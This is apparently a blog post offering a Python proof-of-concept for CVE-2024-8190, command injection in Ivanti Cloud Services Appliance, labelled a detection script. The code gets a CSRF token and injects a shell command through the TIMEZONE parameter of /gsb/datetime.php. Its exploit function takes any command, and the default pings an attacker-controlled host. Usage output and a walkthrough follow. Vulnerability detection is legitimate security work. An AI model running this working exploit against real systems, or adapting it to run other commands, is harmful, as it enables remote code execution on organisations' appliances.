Detecting Invanti Authenticated Command Injection (CVE-2024–8190)

by@secatgourity

1. #!/usr/bin/python3
2. import argparse
3. import re
4. import requests
5. import sys
6. import urllib3
7. from requests.auth import HTTPBasicAuth
8. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9. def exploit(url, username, password, command):
10. u = username
11. p = password
12. s = requests.Session()
13. r = s.get(f”{url}/gsb/datetime.php”, auth=HTTPBasicAuth(u,p), verify=False)
14. m = re.search(r”name=[‘\”]LDCSA_CSRF[‘\”]\s+value=[‘\”]([^’\”]+)[‘\”]”, r.text)
15. if m:
16. ldcsa = m.group(1)
17. print(f”[+] Got LDCSA_CSRF value: {ldcsa}”)
18. else:
19. print(f”[-] Failed getting LDCSA_CRSF token”)
20. sys.exit(0)
21. payload = {
22. “dateTimeFormSubmitted”: “1”,
23. “TIMEZONE”: f”; `{command}` ;”,
24. “CYEAR”: “2024”,
25. “CMONTH”: “9”,
26. “CDAY”: “13”,
27. “CHOUR”: “12”,
28. “CMIN”: “34”,
29. “LDCSA_CSRF”: ldcsa,
30. “SUBMIT_TIME”: “Save”
31. }
32. print(f”[*] Sending payload…”)
33. r = s.post(f”{url}/gsb/datetime.php”, auth=HTTPBasicAuth(u,p), verify=False, data=payload)
34. if __name__ == “__main__”:
35. parser = argparse.ArgumentParser()
36. parser.add_argument(‘-u’, ‘ — url’, help=’The base URL of the target’, required=True)
37. parser.add_argument(‘ — username’, help=’The application username’, required=True)
38. parser.add_argument(‘ — password’, help=’The application password’, required=True)
39. parser.add_argument(‘ — attacker-host’, help=’Burp Collaborator / RequestBin / Interactsh / … hostname’, required=True)
40. args = parser.parse_args()
41. exploit(args.url, args.username, args.password, f”ping -c3 {args.attacker_host}”)

Description

Introduction

An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-8190

Detection Script Usage

kali@kali:/tmp$ python3 detection.py -h
usage: detection.py [-h] -u URL --username USERNAME --password PASSWORD --attacker-host ATTACKER_HOST

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the target
  --username USERNAME   The application username
  --password PASSWORD   The application password
  --attacker-host ATTACKER_HOST
                        Burp Collaborator / RequestBin / Interactsh / ... hostname
                                                                                                                              
kali@kali:/tmp$

Detecting Vulnerable Targets

python3 detection.py -u http://ivanti.local --username admin --password password --attacker-host dm6v2rdhgtwsz.x.pipedream.net

Understanding detection script

The detection script works as follows:

1. It accepts user arguments including the target URL, credentials for the application and the attacker host that must receive the ping probes if the target is vulnerable.
2. Next, the script performs a login to the application /gsb/datetime.php and extracts the CSRF token from the response.
3. If that’s successful, a POST request is submitted to /gsb/datetime.php along with the payload in the TIMEZONE parameter.
4. The injected command is ping -c3 ATTACKER_HOST and is injected to the TIMEZONE parameter as follows: "TIMEZONE": f"; {command} ;".
5. If the target is vulnerable, the attacker-controlled host would receive 3 ping probes confirming of the vulnerability.